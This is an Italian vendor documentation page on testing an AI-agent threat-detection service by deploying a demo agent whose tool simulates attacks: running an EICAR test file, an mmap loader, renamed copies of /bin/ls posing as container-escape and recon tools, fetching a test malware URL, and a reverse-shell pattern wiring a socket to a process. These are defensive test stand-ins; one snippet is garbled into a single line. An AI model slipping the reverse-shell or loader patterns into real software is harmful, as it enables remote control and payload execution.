Testare Agent Platform Threat Detection

Questa pagina spiega come verificare che Agent Platform Threat Detection funzioni attivando intenzionalmente i rilevatori e controllando i risultati. Agent Platform Threat Detection è un servizio integrato di Security Command Center.

Prima di iniziare

Per rilevare potenziali minacce agli agenti Agent Runtime, assicurati che il servizio di rilevamento delle minacce di Agent Platform sia abilitato in Security Command Center.

Configura l'ambiente

Per testare il rilevamento delle minacce di Agent Platform, configura un agente demo che simula attività dannose.

Crea un progetto e attiva la shell

Seleziona o crea un progetto Google Cloud da utilizzare per i test.

Per testare i rilevatori, puoi utilizzare la console Google Cloud e Cloud Shell.

  1. Vai alla consoleGoogle Cloud .

    Vai alla console Google Cloud

  2. Seleziona il progetto che utilizzerai per il test.

  3. Fai clic su Attiva Cloud Shell.

Puoi anche eseguire le istruzioni di test da una shell locale.

Configura Agent Runtime

Se non hai mai utilizzato Agent Runtime in questo progetto, configura l'ambiente Agent Runtime prima di iniziare. Registra il nome del bucket di staging Cloud Storage che hai creato. Ti consigliamo inoltre di seguire la guida rapida di Agent Runtime per imparare a sviluppare e a eseguire il deployment di un agente con l'SDK Vertex AI.

Crea script per il test

Creerai diversi file che verranno utilizzati per il deployment di un nuovo agente per i test. Utilizza un editor di testo, ad esempio nano.

  1. Crea un nuovo file denominato requirements.txt con i seguenti contenuti.

    google-cloud-aiplatform[agent_engines]
    google-adk
    google-genai
    aiohttp
    cloudpickle
    pydantic
    
  2. Crea un nuovo file vuoto denominato installation_scripts/install.sh. Alcuni test richiedono l'aggiunta di contenuti a questo file.

  3. Crea un nuovo file denominato main.py con i seguenti contenuti. Sostituisci le variabili PROJECT_ID, LOCATION e STAGING_BUCKET. Il nome del bucket di staging deve includere il prefisso gs://.

    import asyncio
    import os
    import subprocess
    import socket
    import vertexai
    from vertexai import Client, agent_engines
    from google.adk.agents import llm_agent
    from google.adk.sessions.in_memory_session_service import InMemorySessionService
    
    # Replace with your own project, location, and staging bucket.
    LOCATION = "LOCATION"
    PROJECT_ID = "PROJECT_ID"
    # Staging bucket must have gs:// prefix
    STAGING_BUCKET = "STAGING_BUCKET"
    
    client = Client(project=PROJECT_ID, location=LOCATION)
    
    def _run_command(args, **kwargs):
      output = f"Called {' '.join(args)}\n"
      try:
        res = subprocess.run(args, capture_output=True, text=True, **kwargs)
        if res.stdout:
          output += f"Result: {res.stdout.strip()}\n"
        if res.stderr:
          output += f"Error: {res.stderr.strip()}\n"
      except subprocess.TimeoutExpired:
        output += "Command timed out as expected."
      return output
    
    # Tool to simulate threats. The function body will be replaced for individual
    # detector tests.
    def threat_detection_test():
      output = _run_command(["sleep", "60"])
      output += _run_command(["echo", "this is a fake threat"])
      output += _run_command(["sleep", "10"])
      return output
    
    root_agent = llm_agent.Agent(
        model="gemini-2.5-flash",
        name="threat_detection_test_agent",
        description="Runs threat detection test.",
        instruction="""
          You are an agent that runs a threat detection test using a fake malicious
          command.
        """,
        tools=[threat_detection_test],
    )
    
    async def main():
      vertexai.init(
        project=PROJECT_ID,
        location=LOCATION,
        staging_bucket=STAGING_BUCKET,
      )
      app = agent_engines.AdkApp(
          agent=root_agent, session_service_builder=InMemorySessionService
      )
      remote_agent = client.agent_engines.create(
          agent=app,
          config={
              "display_name": "scc_threat_test_agent",
              "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
              "requirements": [
                  "google-cloud-aiplatform[agent_engines,adk]",
                  "cloudpickle",
                  "pydantic",
              ],
              "staging_bucket": STAGING_BUCKET,
              "extra_packages": [
                  "installation_scripts/install.sh",
              ],
          },
      )
      print("Deployed agent: ", remote_agent.api_resource.name)
    
      try:
          async for event in remote_agent.async_stream_query(
              user_id="threat_detection_tester",
              message="Run the threat detection test",
          ):
            print(event)
      finally:
          client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)
    
    if __name__ == "__main__":
      asyncio.run(main())
    

Configurare l'ambiente virtuale

  1. Crea e attiva un ambiente virtuale Python.

      python3 -m venv env
      source env/bin/activate
    
  2. Installa le dipendenze necessarie nell'ambiente virtuale.

    pip install -r requirements.txt
    

Testa lo script

Esegui lo script dall'interno dell'ambiente virtuale con python3 main.py. L'esecuzione di questo comando richiederà diversi minuti per creare, eseguire il deployment ed eseguire l'agente di test.

Lo script restituisce il nome della risorsa dell'agente di cui è stato eseguito il deployment e alcuni oggetti JSON, tra cui una risposta LLM e altri metadati. Se in questa fase si verificano errori di autorizzazione o di deployment, consulta la risoluzione dei problemi per i passaggi successivi.

Rilevatori di test

Per testare i rilevatori di Agent Platform Threat Detection, sostituisci il codice nella funzione threat_detection_test con un codice che simula un attacco. L'esecuzione dello script può richiedere molto tempo per il deployment e l'interrogazione dell'agente. Per velocizzare i test, puoi combinare i contenuti di diverse di queste funzioni.

Esecuzione: file binario aggiuntivo dannoso eseguito

Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output += _run_command(["touch", "/tmp/test_mal_file"])
  with open("/tmp/test_mal_file", "w") as f:
    f.write(eicar)
  output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
  output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
  output += _run_command(["sleep", "10"])
  return output

Esecuzione: libreria dannosa aggiuntiva caricata

Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test. Potresti ricevere un errore dall'SDK Vertex AI relativo all'analisi della risposta, ma il risultato viene comunque generato.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  with open("/tmp/test_mal_lib", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
  output += _run_command(["sleep", "10"])
  return output

Esecuzione: container escape

Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
  output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
  output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
  output += _run_command(["sleep", "10"])
  return output

Esecuzione: esecuzione dello strumento di attacco Kubernetes

Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
  output += _run_command(["/tmp/amicontained"])
  output += _run_command(["sleep", "10"])
  return output

Esecuzione: esecuzione dello strumento di ricognizione locale

Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
  output += _run_command(["/tmp/linenum.sh"])
  output += _run_command(["sleep", "10"])
  return output

Esecuzione: File binario dannoso modificato eseguito

Replace the `threat_detection_test` function in the test script, and then run the
test script.

```python
def threat_detection_test():
    eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
    output = _run_command(["sleep", "60"])
    output += _run_command(["chmod", "-R", "777", "/code"])
    with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)

output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```

Esecuzione: libreria dannosa modificata caricata

Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.

def threat_detection_test():
  eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
  output = _run_command(["sleep", "60"])
  output += _run_command(["chmod", "-R", "777", "/code"])
  with open("/code/entrypoint.sh", "w") as f:
    f.write(eicar)
  with open("/tmp/loader.c", "w") as f:
    f.write("""
      #include <fcntl.h>
      #include <sys/mman.h>
      #include <sys/stat.h>
      #include <unistd.h>
      #include <stdlib.h>
      int main(int argc, char *argv[]) {
         int fd = open(argv[1], O_RDONLY);
         struct stat sb;
         fstat(fd, &sb);
         void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
         write(1, addr, sb.st_size);
         munmap(addr, sb.st_size);
         close(fd);
         return 0;
      }
    """)
  output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
  output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
  output += _run_command(["sleep", "10"])
  return output

Rilevato URL dannoso

Aggiorna il file installation_scripts/install.sh con i seguenti contenuti.

#!/bin/bash
apt-get install -y curl --no-install-recommends

Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.

def threat_detection_test():
  url = "https://testsafebrowsing.appspot.com/s/malware.html"
  output = _run_command(["sleep", "60"])
  output += _run_command(["curl", url])
  output += _run_command(["sleep", "10"])
  return output

Shell inversa

Sostituisci la funzione threat_detection_test nello script per il test, quindi esegui lo script per il test.

def threat_detection_test():
  output = _run_command(["sleep", "60"])
  output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("8.8.8.8", 53))
  subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
  output += _run_command(["sleep", "10"])
  return output

Passaggi successivi